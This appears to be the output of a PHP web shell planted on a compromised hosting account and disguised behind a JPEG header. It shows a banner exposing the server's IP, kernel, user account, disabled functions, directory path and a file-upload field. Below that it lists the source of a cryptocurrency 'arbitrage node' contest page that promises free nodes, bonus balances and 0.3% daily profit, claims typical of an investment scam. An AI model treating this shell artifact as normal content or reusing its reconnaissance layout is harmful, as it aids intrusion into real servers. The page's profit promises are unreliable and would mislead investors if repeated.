���� JFIF aewtgwgerwasdasd
Server IP : 147.93.80.58 / Your IP : 216.73.216.195 Web Server : LiteSpeed System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u939086737 ( 939086737) PHP Version : 8.2.28 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u939086737/domains/arbtrade.in/public_html/ |
Upload File : |
<?php include_once 'header.php' ?> <!-- head --> <div class="section section--head"> <div class="container"> <div class="row"> <!-- title --> <div class="col-12 col-md-10 offset-md-1 col-lg-8 offset-lg-2 col-xl-6 offset-xl-3"> <div class="section__title"> <h1>Contest</h1> <p>Take part in the drawing for a junior arbitrage node. Receive passive income from the price differences in cryptocurrency assets, even without active involvement.</p> </div> </div> <!-- end title --> </div> </div> </div> <!-- end head --> <!-- contest --> <div class="section"> <div class="container"> <div class="row row--relative"> <div class="col-12 col-lg-7 col-xl-8"> <!-- invest --> <div class="invest invest--contest"> <h2 class="invest__title">Arbitration Node Junior</h2> <p class="invest__text">Arbitrage nodes are specialized units equipped with cutting-edge algorithms that automatically scan multiple cryptocurrency exchanges, identifying price disparities in assets. Don't miss the chance to be part of a highly profitable arbitrage trading strategy. Win arbitrage node and start effectively managing your cryptocurrency portfolio today.</p> <div class="progressbar progressbar--contest"> <h3 class="progressbar__title">Contestants:</h3> <div class="progress" role="progressbar" aria-label="Animated striped" aria-valuenow="75" aria-valuemin="0" aria-valuemax="100"><div class="progress-bar progress-bar-striped progress-bar-animated" style="width: 75%"><span>75</span></div></div> <div class="progressbar__values"> <span class="progressbar__value progressbar__value--left">0</span> <span class="progressbar__value progressbar__value--right">100</span> </div> </div> <!-- design elements --> <span class="block-icon block-icon--red"> <i class="ti ti-mood-dollar"></i> </span> <span class="screw screw--lines-bl"></span> <span class="screw screw--lines-br"></span> <span class="screw screw--lines-tr"></span> </div> <!-- end invest --> </div> <div class="col-12 col-lg-5 col-xl-4"> <!-- node --> <div class="node node--contest"> <h3 class="node__title node__title--purple"><b>20</b> <?= $p_name ?></h3> <span class="node__date">30 days</span> <span class="node__price">Promotional: <b>Free</b></span> <span class="node__line"><img src="img/dodgers/dots--line-purple.svg" alt=""></span> <ul class="node__list"> <li><i class="ti ti-circle-check"></i><b>1.1%</b> of the deposit amount</li> <li><i class="ti ti-circle-check"></i><b>$10</b> to the principal balance</li> <li><i class="ti ti-circle-check"></i><b>$20</b> bonus balance</li> <li><i class="ti ti-circle-check"></i><b>+ 0.3%</b> daily profit</li> </ul> <button class="node__btn" data-bs-target="#modal-node" type="button" data-bs-toggle="modal">Take part</button> <!-- design elements --> <span class="stats__dodger stats__dodger--left stats__dodger--purple"></span> <span class="stats__dodger stats__dodger--right stats__dodger--purple"></span> <span class="screw screw--br"></span> <span class="screw screw--bl"></span> </div> <!-- end node --> </div> <!-- animation background --> <div class="section__canvas section__canvas--page section__canvas--first" id="canvas"></div> </div> </div> </div> <!-- end contest --> <?php include_once 'footer.php' ?>